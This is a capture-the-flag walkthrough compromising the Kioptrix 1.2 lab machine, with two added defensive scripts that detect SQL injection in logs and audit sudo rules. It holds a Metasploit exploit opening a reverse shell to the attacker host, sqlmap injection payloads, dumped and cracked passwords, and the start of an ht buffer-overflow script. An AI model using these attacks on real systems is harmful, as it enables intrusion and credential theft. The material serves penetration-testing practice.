Kioptrix 1.2 (Lvl 3)
Enumeration
Nmap
Searching for the target machine:
root@Kali:~/kioptrix-1-2# nmap 192.168.122.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-17 08:48 CET
Nmap scan report for 192.168.122.1
Host is up (0.00031s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
53/tcp open domain
MAC Address: FE:54:00:48:49:8A (Unknown)
Nmap scan report for 192.168.122.188
Host is up (0.0026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 52:54:00:48:49:8A (QEMU virtual NIC)
Nmap scan report for Kali (192.168.122.197)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (3 hosts up) scanned in 15.35 seconds
Here the IP ending in .188 is our target.
dirb
root@Kali:~/kioptrix-1-2# dirb http://192.168.122.188
---- Scanning URL: http://192.168.122.188/ ----
==> DIRECTORY: http://192.168.122.188/cache/
==> DIRECTORY: http://192.168.122.188/core/
+ http://192.168.122.188/data (CODE:403|SIZE:326)
+ http://192.168.122.188/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.122.188/gallery/
+ http://192.168.122.188/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.122.188/modules/
==> DIRECTORY: http://192.168.122.188/phpmyadmin/
+ http://192.168.122.188/server-status (CODE:403|SIZE:335)
==> DIRECTORY: http://192.168.122.188/style/
---- Entering directory: http://192.168.122.188/cache/ ----
+ http://192.168.122.188/cache/index.html (CODE:200|SIZE:1819)
---- Entering directory: http://192.168.122.188/core/ ----
==> DIRECTORY: http://192.168.122.188/core/controller/
+ http://192.168.122.188/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.122.188/core/lib/
==> DIRECTORY: http://192.168.122.188/core/model/
==> DIRECTORY: http://192.168.122.188/core/view/
---- Entering directory: http://192.168.122.188/gallery/ ----
+ http://192.168.122.188/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://192.168.122.188/gallery/photos/
==> DIRECTORY: http://192.168.122.188/gallery/themes/
---- Entering directory: http://192.168.122.188/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/ ----
+ http://192.168.122.188/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.122.188/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://192.168.122.188/phpmyadmin/js/
==> DIRECTORY: http://192.168.122.188/phpmyadmin/lang/
+ http://192.168.122.188/phpmyadmin/libraries (CODE:403|SIZE:342)
+ http://192.168.122.188/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.122.188/phpmyadmin/scripts/
==> DIRECTORY: http://192.168.122.188/phpmyadmin/themes/
---- Entering directory: http://192.168.122.188/style/ ----
+ http://192.168.122.188/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.122.188/style/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/controller/ ----
+ http://192.168.122.188/core/controller/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/lib/ ----
+ http://192.168.122.188/core/lib/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/model/ ----
+ http://192.168.122.188/core/model/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/view/ ----
+ http://192.168.122.188/core/view/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Mar 17 09:09:53 2018
DOWNLOADED: 46120 - FOUND: 17
As we can see, quite a few directories are listable, which suggests a misconfigured web server.
Nikto
root@Kali:~/kioptrix-1-2# nikto -host http://192.168.122.188
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.122.188
+ Target Hostname: 192.168.122.188
+ Target Port: 80
+ Start Time: 2018-03-17 09:12:42 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 21:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2018-03-17 09:13:06 (GMT1) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Here too we find some information that will be useful later on.
Exploitation
Now for the interesting part, the exploitation phase. Here is a list of potential vulnerabilities:
phpMyAdmin 2.11.3deb1ubuntu1.3
LotusCMS
searchsploit
root@Kali:~# searchsploit phpmyadmin 2.11
-------------------------------------------------------------- ----------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------
phpMyAdmin 2.11.1 - 'Server_Status.php' Cross-Site Scripting | exploits/php/webapps/30733.txt
phpMyAdmin 2.11.1 - 'setup.php' Cross-Site Scripting | exploits/php/webapps/30653.txt
-------------------------------------------------------------- ----------
root@Kali:~# searchsploit lotuscms
-------------------------------------------------------------- ----------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt
-------------------------------------------------------------- ----------
To summarize:
- Two XSS flaws in phpMyAdmin (hard to exploit)
- A Metasploit exploit for LotusCMS
Exploiting LotusCMS
msf > use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.122.188
RHOST => 192.168.122.188
msf exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.122.188 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.122.197 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf exploit(multi/http/lcms_php_exec) > run
[*] Started reverse TCP handler on 192.168.122.197:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (37543 bytes) to 192.168.122.188
[*] Meterpreter session 2 opened (192.168.122.197:4444 -> 192.168.122.188:49110) at 2018-03-17 22:07:28 +0100
meterpreter >
We now have a nice reverse shell through meterpreter; let's try to get a shell:
meterpreter > shell
Process 4319 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$
Thanks to python we get an interactive shell that is more usable than the original one.
Privilege escalation
As a reminder, we must end up as root on the target machine; let's start with ExploitSuggest.py:
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- < 2.6.29 exit_notify() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8369 || Language=c
- 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation || http://www.exploit-db.com/exploits/9844 || Language=python
- < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit || http://www.exploit-db.com/exploits/14814 || Language=c
- 2.x sock_sendpage() Local Root Exploit 2 || http://www.exploit-db.com/exploits/9436 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
- 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || http://www.exploit-db.com/exploits/9479 || Language=c
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit || http://www.exploit-db.com/exploits/5092 || Language=c
- Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit || http://www.exploit-db.com/exploits/9083 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit [2] || http://www.exploit-db.com/exploits/9598 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- Linux RDS Protocol Local Privilege Escalation || http://www.exploit-db.com/exploits/15285 || Language=c
- 2.6.x ptrace_attach Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8673 || Language=c
- 2.x sock_sendpage() Local Ring0 Root Exploit || http://www.exploit-db.com/exploits/9435 || Language=c
- Test Kernel Local Root Exploit 0day || http://www.exploit-db.com/exploits/9191 || Language=c
- 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || http://www.exploit-db.com/exploits/926 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || http://www.exploit-db.com/exploits/9545 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- < 2.6.36.2 Econet Privilege Escalation Exploit || http://www.exploit-db.com/exploits/17787 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby
- < 2.6.37-rc2 ACPI custom_method Privilege Escalation || http://www.exploit-db.com/exploits/15774 || Language=c
- 'pipe.c' Local Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/10018 || Language=sh
- 2.4/2.6 sock_sendpage() Local Root Exploit [3] || http://www.exploit-db.com/exploits/9641 || Language=c
- <= 2.6.37 Local Privilege Escalation || http://www.exploit-db.com/exploits/15704 || Language=c
- 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/895 || Language=c
Finished
What is listening on the server?
netstat -paunt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 192.168.122.188:41615 192.168.122.197:4444 ESTABLISHED 4282/sh
tcp6 0 0 :::80 :::* LISTEN 4282/sh
tcp6 0 0 :::22 :::* LISTEN -
tcp6 1 0 192.168.122.188:80 192.168.122.197:37961 CLOSE_WAIT 4282/sh
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
In short:
- MySQL (3306)
- bootpc (68, to be verified)
We will also look at the applications running on the server:
- LotusCMS
- PhpMyAdmin
- Gallarific
While browsing the gallery, we notice that the URL takes an interesting form:
http://kioptrix3.com/gallery/gallery.php?id=1
This suggests a possible SQL injection. Let's test our hypothesis:
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1"
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8387 OR 3370=3370#
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(5785,4618)>(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(5785=5785,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM (SELECT 4549 UNION SELECT 6519 UNION SELECT 3605 UNION SELECT 8414)a GROUP BY x)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x717a706a71,0x744f77655a4d56724f7368705753584f436c5365524745596a416d6955584e5574634f57704e4474,0x71706b7071),NULL,NULL,NULL,NULL,NULL-- yRNq
---
[23:19:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
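From the defender's side, each of the four techniques sqlmap reported above leaves a recognisable trace in the web server's access log. The following Python script is an added example (not part of the original writeup): it parses Apache combined-format lines, URL-decodes the request target and tags the technique; the log lines are constructed from the payloads above and the two hosts of this lab.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One signature per technique sqlmap reported against gallery.php?id=
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\b(?:OR|AND)\s+\d+\s*=\s*\d+", re.I)),
    ("error-based (FLOOR/RAND)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]

# Constructed sample: the attacking host and the sqlmap payloads shown above,
# URL-encoded the way they appear in a real access log.
SAMPLE_LOG = [
    '192.168.122.197 - - [17/Mar/2018:23:19:01 +0100] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 5650 "-" "Mozilla/5.0"',
    '192.168.122.197 - - [17/Mar/2018:23:19:02 +0100] "GET /gallery/gallery.php?id=-8387%20OR%203370%3D3370%23 HTTP/1.1" 200 5650 "-" "sqlmap/1.2"',
    '192.168.122.197 - - [17/Mar/2018:23:19:03 +0100] "GET /gallery/gallery.php?id=1%20OR%20SLEEP%285%29 HTTP/1.1" 200 5650 "-" "sqlmap/1.2"',
    '192.168.122.197 - - [17/Mar/2018:23:19:04 +0100] "GET /gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20yRNq HTTP/1.1" 200 5650 "-" "sqlmap/1.2"',
    '192.168.122.197 - - [17/Mar/2018:23:19:05 +0100] "GET /gallery/gallery.php?id=1%20OR%20ROW%285785%2C4618%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a706a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%204549%20UNION%20SELECT%206519%29a%20GROUP%20BY%20x%29 HTTP/1.1" 500 1203 "-" "sqlmap/1.2"',
]


def decode_target(target):
    """URL-decode the request target; repeat so double encoding does not hide a payload."""
    decoded = target
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify(target):
    """Return the names of the injection techniques whose signature matches the target."""
    decoded = decode_target(target)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan(lines):
    """Parse log lines and return one hit per request that looks like SQL injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        techniques = classify(m.group("target"))
        if techniques:
            hits.append({
                "ip": m.group("ip"),
                "path": m.group("target").split("?", 1)[0],
                "status": int(m.group("status")),
                "techniques": techniques,
            })
    return hits


def summarize(hits):
    """Collapse hits per source IP: the set of techniques seen from each address."""
    per_ip = {}
    for h in hits:
        per_ip.setdefault(h["ip"], set()).update(h["techniques"])
    return per_ip


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["path"], h["status"], ", ".join(h["techniques"]))
    for ip, techs in summarize(hits).items():
        print(f"{ip}: {len(techs)} distinct techniques -> automated scanner likely")
```

A single source address exercising several techniques against one parameter in a few seconds is the signature of an automated tool rather than a stray request, so the per-IP summary is what an alert should key on.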
We guessed right! Now for the dump:
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump
[23:22:53] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[23:22:53] [INFO] the SQL query used returns 3 entries
[23:22:53] [INFO] the SQL query used returns 3 entries
[23:22:53] [INFO] retrieved: id
[23:22:53] [INFO] retrieved: int(10)
[23:22:53] [INFO] retrieved: username
[23:22:53] [INFO] retrieved: varchar(50)
[23:22:53] [INFO] retrieved: password
[23:22:53] [INFO] retrieved: varchar(50)
[23:22:53] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[23:22:53] [INFO] the SQL query used returns 2 entries
[23:22:53] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[23:22:53] [WARNING] automatically patching output having last char trimmed
[23:22:53] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[23:22:53] [INFO] recognized possible password hashes in column 'password'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:23:32] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[23:23:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[23:23:36] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:23:36] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[23:23:50] [INFO] cracked password 'Mast3r' for user 'dreg'
[23:23:55] [INFO] cracked password 'starwars' for user 'loneferret'
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
So we have recovered access to two accounts. Let's try them over SSH:
root@Kali:~# ssh loneferret@192.168.122.188
loneferret@192.168.122.188's password:
loneferret@Kioptrix3:~$
root@Kali:~# ssh dreg@192.168.122.188
dreg@192.168.122.188's password:
dreg@Kioptrix3:~$
The mistake here is having reused the same passwords everywhere. Let's now try to find exploitable information.
Can we use sudo?
dreg@Kioptrix3:~$ sudo -l
[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
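What makes the sudo -l output above dangerous is not the negated su entry but the editor: a program that opens and writes files as root is root-equivalent, and the "!" entry removes nothing that the other rule grants. The following Python script is an added example (not part of the original writeup) that parses sudo -l output and flags such rules; the list of file-capable programs is an illustrative assumption, not an exhaustive one.

```python
import os
import re
from collections import namedtuple

Rule = namedtuple("Rule", "runas tags command negated")

# A privilege line of `sudo -l` looks like: "(runas) TAG: TAG: command"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<command>\S.*?)\s*$"
)

# Illustrative list (assumption, not exhaustive): programs that, run as root,
# let the caller read or write arbitrary files or start a shell.
FILE_CAPABLE = {"ht", "vi", "vim", "nano", "emacs", "less", "more",
                "sh", "bash", "python", "perl", "cp", "tee"}

# Constructed samples reproducing the two outputs seen on this box.
SUDO_L_LONEFERRET = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""
SUDO_L_DREG = "Sorry, user dreg may not run sudo on Kioptrix3.\n"


def parse_sudo_l(output):
    """Extract the privilege rules from `sudo -l` output; non-rule lines are ignored."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        command = m.group("command")
        negated = command.startswith("!")
        rules.append(Rule(m.group("runas"), tags, command.lstrip("!"), negated))
    return rules


def audit(rules):
    """Return (severity, command, reason) for rules that are root-equivalent or misleading."""
    findings = []
    for r in rules:
        if r.negated:
            # sudoers negation is a deny entry: it never restricts what other entries allow.
            findings.append(("info", r.command,
                             "'!' entry denies nothing that the allowed entries grant"))
            continue
        nopass = " without a password" if "NOPASSWD" in r.tags else ""
        program = os.path.basename(r.command.split()[0])
        if r.command == "ALL":
            findings.append(("critical", r.command,
                             f"any command as {r.runas}{nopass}"))
        elif program in FILE_CAPABLE:
            findings.append(("high", r.command,
                             f"{program} runs as {r.runas}{nopass} and can read or write "
                             f"any file, which is equivalent to a {r.runas} shell"))
    return findings


if __name__ == "__main__":
    for user, output in (("loneferret", SUDO_L_LONEFERRET), ("dreg", SUDO_L_DREG)):
        print(f"== {user}")
        for severity, command, reason in audit(parse_sudo_l(output)):
            print(f"[{severity}] {command}: {reason}")
```

The fix on the sudoers side is to grant only non-interactive, argument-restricted commands; a deny entry such as !/usr/bin/su is documented by sudo itself as ineffective and should not be relied on.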
Clearly loneferret has some sudo rights; let's examine his home directory:
loneferret@Kioptrix3:~$ ls -al
total 144
drwxr-xr-x 3 loneferret loneferret 4096 Apr 14 04:10 .
drwxr-xr-x 5 root root 4096 Apr 16 2011 ..
-rw-r--r-- 1 loneferret users 2131 Apr 14 04:50 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 Apr 11 2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 Apr 11 2011 .bashrc
-rw-r--r-- 1 root root 1745 Apr 14 03:56 .htcfg2
-rw------- 1 loneferret users 40 Apr 1 17:39 .mysql_history
-rw------- 1 root root 15 Apr 15 2011 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 Apr 11 2011 .profile
drwx------ 2 loneferret loneferret 4096 Apr 14 2011 .ssh
-rw-r--r-- 1 loneferret loneferret 0 Apr 11 2011 .sudo_as_admin_successful
-rw-r--r-- 1 root root 215 Apr 14 03:49 CompanyPolicy.README
Let's read the contents of CompanyPolicy.README:
Hello,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
HT editor is a hex editor intended for modifying and analyzing executables. Let's check the installed version:
loneferret@Kioptrix3:~$ ht -v
ht 2.0.18 (POSIX) 07:26:02 on Apr 16 2011
(c) 1999-2004 Stefan Weyergraf
(c) 1999-2009 Sebastian Biallas <sb@biallas.net>
After some research, we find a python exploit for this editor:
#!/usr/bin/python
# Run with: ht $(python shellcode.py)
# Buffer on 4400 -> root@bt:/opt/metasploit/msf3/tools# ruby pattern_create.rb 4400
bufferoverflow="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6